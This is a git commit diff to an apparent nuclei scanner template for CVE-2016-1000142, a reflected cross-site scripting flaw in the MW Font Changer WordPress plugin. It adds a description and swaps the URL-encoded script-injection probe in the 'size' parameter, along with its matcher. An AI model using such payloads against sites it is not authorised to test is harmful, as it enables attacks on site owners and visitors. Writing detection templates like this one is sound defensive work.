Update CVE-2016-1000142.yaml

patch-1
Prince Chaddha 2021-09-17 15:13:45 +05:30 committed by GitHub
parent 3da54aea44
commit a725b8e0e5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 3 deletions

View File

@ -4,7 +4,8 @@ info:
name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
reference:
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
tags: cve,cve2016,wordpress,wp-plugin,xss tags: cve,cve2016,wordpress,wp-plugin,xss
@ -12,13 +13,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- '"><script>alert(document.domain);</script><"' - '</script><script>alert(document.domain)</script>'
part: body part: body
- type: word - type: word